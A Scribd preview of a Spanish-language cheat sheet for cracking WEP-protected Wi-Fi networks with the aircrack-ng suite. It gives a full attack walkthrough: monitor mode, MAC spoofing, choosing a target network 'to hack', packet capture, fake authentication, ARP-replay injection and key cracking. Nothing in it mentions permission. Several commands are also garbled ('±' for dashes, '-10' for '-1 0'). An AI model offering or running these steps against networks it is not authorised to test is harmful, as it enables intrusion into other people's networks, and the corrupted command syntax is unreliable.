P. 1
Comandos Backtrack

Comandos Backtrack

|Views: 1.481|Likes:

More info:

Published by: Sebastian Ignacio Bustos Bahamondes on Apr 23, 2011
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOCX, PDF, TXT or read online from Scribd
See more
See less

05/01/2013

pdf

text

original

COMANDOS PARA BACKTRACK [AIRCRACK] airmon-ng // Indica que tipo de tarjeta tienes (mon0, wlan0, etc) airmon-ng stop

wlan0 // Desactiva el modo monitor de la tarjeta (NO-Promiscuo) wlan0-->Tipo de la tarjeta que estas utilizando. ifconfig wlan0 down macchanger ±-mac 00:11:22:33:44:55 wlan0 //Cambia la mac de tu tarjeta. airmon-ngstart wlan0//Habilita el modo monitor en la tarjeta (Modo Promiscuo) MODE MONITOR ENABLED ON mon0 (utilizar este tipo de tarjeta de ahora en adelante o el modo que a ud. le aparezca) airodump-ng mon0 //Monitoreo de redes wifi cercanas. Mientras PWR es más cercano a 0 más cerca está la red. Se recomienda desde un -75 hasta 0. //Termine de escanear redes con CTRL+C //Seleccione la red que va a hackear y copie el BSSID de la red en cuestión. Además memorice el Canal de la red CH. airodump-ng ±c[canal] ±w[nombre_del_archivo] ±bssid [bssid_que_copiamos] mon0 //[] Los paréntesis de corchetes no se escriben //-w = nombre del archivo donde se capturaran los paquetes Ejemplo: -w clave El número que nos interesa que aumente se llama DATA. Este nos indica la cantidad de paquetes que se han capturado. Una cantidad aceptable es 10.000 hacia arriba. Aunque hay veces que para descifrar la clave se necesitan 40.000 o más. Como verán el número puede que avance de forma extremadamente lenta y tardaríamos quizás días en saber la contraseña. SOLUCION: INYECCION DE PAQUETES.- (EN OTRA VENTANA SHELL) Para inyectar paquetes introducimos los siguientes comandos: ¬AUTENTIFICACION FALSA DENTRO DE LA RED aireplay-ng -10 ±a [bssid_que_copiamos] ±h 00:11:22:33:44:55 ±e[nombre_de_la_red] mon0 //[] Los paréntesis de corchetes no se escriben //-e = nombre de la red Ejemplo: seba, sebaGAY, etc« Para que la autentificación falsa este correcta debe decir algo como esto. Associationsuccefull :-)// Tal cual, hasta con la carita feliz. En caso que no se conecte, indicara que la señal puede ser muy baja o se haya protegido de alguna manera de este tipo de ataques. Si no se conecta será imposible inyectar paquetes. **Al menos de esta forma** Luego de conectarse existen dos maneras de inyectar paquetes. Menciono que la primera es la que mejor me ha resultado para mí. FORMA1 aireplay-ng -2 ±p 0841 ±c ff:ff:ff:ff:ff:ff ±h 00:11:22:33:44:55 mon0 //El comando comenzara a leer paquetes luego que termine presione Yy luego ENTER. A continuación visualizaremos como la cifra de DATA comienza a aumentar rápidamente, esperemos que llegue a 20.000 para estar seguros. FORMA2 aireplay-ng -3 ±b [bssid_que_copiamos] ±h 00:11:22:33:44:55 mon0 //El comando comenzara a capturar paquetes enseguida. DESCIFRANDO LA CLAVE Una vez que hayamos capturado los paquetes necesarios podremos descifrar la clave. aircrack-ng clave-01.cap //clave=nombre en donde capturamos -01.cap= por default si volvemos a capturar con el mismo nombre sin reiniciar el pc debemos poner clave-02.cap y así sucesivamente. Comenzará a descifrar la clave. Si los paquetes no fueron suficientes indicara algo como TRY next 40.000 Ivs. Esto quiere decir que debes esperar que se capturen 40.000 paquetes para el próximo intento de descifrado. Solo tienes que esperar...

You're Reading a Free Preview

Descarga
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->